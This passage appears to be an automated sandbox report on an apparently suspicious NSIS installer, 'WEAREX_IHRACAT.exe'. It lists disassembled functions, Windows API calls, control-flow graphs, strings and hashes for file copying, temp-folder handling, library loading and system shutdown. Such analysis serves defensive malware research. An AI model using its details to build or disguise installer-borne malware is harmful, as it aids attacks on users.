                            • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                          • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",00000000), ref: 004033D9
                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",00000020), ref: 00403400
                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
                          • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                          • OleUninitialize.OLE32(?), ref: 0040361F
                          • ExitProcess.KERNEL32 ref: 0040363F
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",00000000,?), ref: 0040364B
                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",00000000,?), ref: 00403657
                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
                          • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\WEAREX_IHRACAT.exe,0041FE90,00000001), ref: 004036D8
                          • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                          • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                          • ExitProcess.KERNEL32 ref: 004037BA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WEAREX_IHRACAT.exe$C:\Users\user\gangningerne\jot\mtn$C:\Users\user\gangningerne\jot\mtn\Discomplexion$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                          • API String ID: 4107622049-772951401
                          • Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                          • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                          • Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                          • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E
                          Function 00405F0A Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 258 405f0a-405f15 259 405f17-405f26 258->259 260 405f28-405f3e 258->260 259->260 261 405f44-405f51 260->261 262 406156-40615c 260->262 261->262 265 405f57-405f5e 261->265 263 406162-40616d 262->263 264 405f63-405f70 262->264 266 406178-406179 263->266 267 40616f-406173 call 405ee8 263->267 264->263 268 405f76-405f82 264->268 265->262 267->266 270 406143 268->270 271 405f88-405fc4 268->271 272 406151-406154 270->272 273 406145-40614f 270->273 274 4060e4-4060e8 271->274 275 405fca-405fd5 GetVersion 271->275 272->262 273->262 276 4060ea-4060ee 274->276 277 40611d-406121 274->277 278 405fd7-405fdb 275->278 279 405fef 275->279 280 4060f0-4060fc call 405e2f 276->280 281 4060fe-40610b call 405ee8 276->281 283 406130-406141 lstrlenW 277->283 284 406123-40612b call 405f0a 277->284 278->279 285 405fdd-405fe1 278->285 282 405ff6-405ffd 279->282 296 406110-406119 280->296 281->296 288 406002-406004 282->288 289 405fff-406001 282->289 283->262 284->283 285->279 286 405fe3-405fe7 285->286 286->279 292 405fe9-405fed 286->292 294 406040-406043 288->294 295 406006-40602c call 405db5 288->295 289->288 292->282 299 406053-406056 294->299 300 406045-406051 GetSystemDirectoryW 294->300 306 406032-40603b call 405f0a 295->306 307 4060cb-4060cf 295->307 296->283 298 40611b 296->298 302 4060dc-4060e2 call 40617c 298->302 304 4060c1-4060c3 299->304 305 406058-406066 GetWindowsDirectoryW 299->305 303 4060c5-4060c9 300->303 302->283 303->302 303->307 304->303 308 406068-406072 304->308 305->304 306->303 307->302 313 4060d1-4060d7 lstrcatW 307->313 310 406074-406077 308->310 311 40608c-4060a2 SHGetSpecialFolderLocation 308->311 310->311 315 406079-406080 310->315 316 4060a4-4060bb SHGetPathFromIDListW CoTaskMemFree 311->316 317 4060bd 311->317 313->302 319 406088-40608a 315->319 316->303 316->317 317->304 319->303 319->311
                          APIs
                          • GetVersion.KERNEL32(00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00405FCD
                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604B
                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 0040605E
                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060A8
                          • CoTaskMemFree.OLE32(?), ref: 004060B3
                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                          • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00406131
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 900638850-1230650788
                          • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                          • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                          • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                          • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E
                          Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 320 405770-405796 call 405a3b 323 405798-4057aa DeleteFileW 320->323 324 4057af-4057b6 320->324 325 40592c-405930 323->325 326 4057b8-4057ba 324->326 327 4057c9-4057d9 call 405ee8 324->327 328 4057c0-4057c3 326->328 329 4058da-4058df 326->329 333 4057e8-4057e9 call 40597f 327->333 334 4057db-4057e6 lstrcatW 327->334 328->327 328->329 329->325 332 4058e1-4058e4 329->332 335 4058e6-4058ec 332->335 336 4058ee-4058f6 call 40622b 332->336 337 4057ee-4057f2 333->337 334->337 335->325 336->325 343 4058f8-40590c call 405933 call 405728 336->343 341 4057f4-4057fc 337->341 342 4057fe-405804 lstrcatW 337->342 341->342 344 405809-405825 lstrlenW FindFirstFileW 341->344 342->344 360 405924-405927 call 405192 343->360 361 40590e-405911 343->361 345 40582b-405833 344->345 346 4058cf-4058d3 344->346 348 405853-405867 call 405ee8 345->348 349 405835-40583d 345->349 346->329 351 4058d5 346->351 362 405869-405871 348->362 363 40587e-405889 call 405728 348->363 352 4058b2-4058c2 FindNextFileW 349->352 353 40583f-405847 349->353 351->329 352->345 359 4058c8-4058c9 FindClose 352->359 353->348 356 405849-405851 353->356 356->348 356->352 359->346 360->325 361->335 364 405913-405922 call 405192 call 405d82 361->364 362->352 365 405873-40587c call 405770 362->365 373 4058aa-4058ad call 405192 363->373 374 40588b-40588e 363->374 364->325 365->352 373->352 377 405890-4058a0 call 405192 call 405d82 374->377 378 4058a2-4058a8 374->378 377->352 378->352
                          APIs
                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 00405799
                          • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 004057E1
                          • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 00405804
                          • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 0040580A
                          • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 0040581A
                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                          • FindClose.KERNEL32(00000000), ref: 004058C9
                          Strings
                          • "C:\Users\user\Desktop\WEAREX_IHRACAT.exe", xrefs: 00405779
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                          • \*.*, xrefs: 004057DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                          • API String ID: 2035342205-1219310517
                          • Opcode ID: 8c3b492f51f2aa56c01f6892731e0635e14f6b509c2227e8f90ab5b8896d8952
                          • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                          • Opcode Fuzzy Hash: 8c3b492f51f2aa56c01f6892731e0635e14f6b509c2227e8f90ab5b8896d8952
                          • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                          Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                          • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                          • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                          • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                          Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,752C2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,752C2EE0), ref: 00406236
                          • FindClose.KERNELBASE(00000000), ref: 00406242
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: WB
                          • API String ID: 2295610775-2854515933
                          • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                          • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                          • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                          • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                          Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                          • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                          • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9
                          Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040277D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
                          • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
                          • Opcode Fuzzy Hash: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
                          • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
                          Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 116 4038b2-4038ca call 406252 119 4038cc-4038dc call 405e2f 116->119 120 4038de-403915 call 405db5 116->120 127 403938-403961 call 403b88 call 405a3b 119->127 125 403917-403928 call 405db5 120->125 126 40392d-403933 lstrcatW 120->126 125->126 126->127 134 4039f3-4039fb call 405a3b 127->134 135 403967-40396c 127->135 141 403a09-403a2e LoadImageW 134->141 142 4039fd-403a04 call 405f0a 134->142 135->134 136 403972-40399a call 405db5 135->136 136->134 143 40399c-4039a0 136->143 145 403a30-403a60 RegisterClassW 141->145 146 403aaf-403ab7 call 40140b 141->146 142->141 148 4039b2-4039be lstrlenW 143->148 149 4039a2-4039af call 405960 143->149 150 403a66-403aaa SystemParametersInfoW CreateWindowExW 145->150 151 403b7e 145->151 157 403ac1-403acc call 403b88 146->157 158 403ab9-403abc 146->158 155 4039c0-4039ce lstrcmpiW 148->155 156 4039e6-4039ee call 405933 call 405ee8 148->156 149->148 150->146 153 403b80-403b87 151->153 155->156 161 4039d0-4039da GetFileAttributesW 155->161 156->134 169 403ad2-403aef ShowWindow LoadLibraryW 157->169 170 403b55-403b5d call 405265 157->170 158->153 162 4039e0-4039e1 call 40597f 161->162 163 4039dc-4039de 161->163 162->156 163->156 163->162 172 403af1-403af6 LoadLibraryW 169->172 173 403af8-403b0a GetClassInfoW 169->173 177 403b77-403b79 call 40140b 170->177 178 403b5f-403b65 170->178 172->173 175 403b22-403b53 DialogBoxParamW call 40140b call 403802 173->175 176 403b0c-403b1c GetClassInfoW RegisterClassW 173->176 175->153 176->175 177->151 178->158 180 403b6b-403b72 call 40140b 178->180 180->158
                          APIs
                            • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                            • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                            • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                          • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,752C3420,00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 00403933
                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\gangningerne\jot\mtn,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\gangningerne\jot\mtn,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                          • GetFileAttributesW.KERNEL32(Call), ref: 004039D1
                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\gangningerne\jot\mtn), ref: 00403A1A
                            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                          • RegisterClassW.USER32(00428180), ref: 00403A57
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                          • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AEB
                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                          • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                          • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                          • RegisterClassW.USER32(00428180), ref: 00403B1C
                          • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\gangningerne\jot\mtn$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                          • API String ID: 914957316-2933927330
                          • Opcode ID: 7591e99d3b1f4cc40b45e62746b81664c4dcf89d43ee78bcadefa554f4fd18e3
                          • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
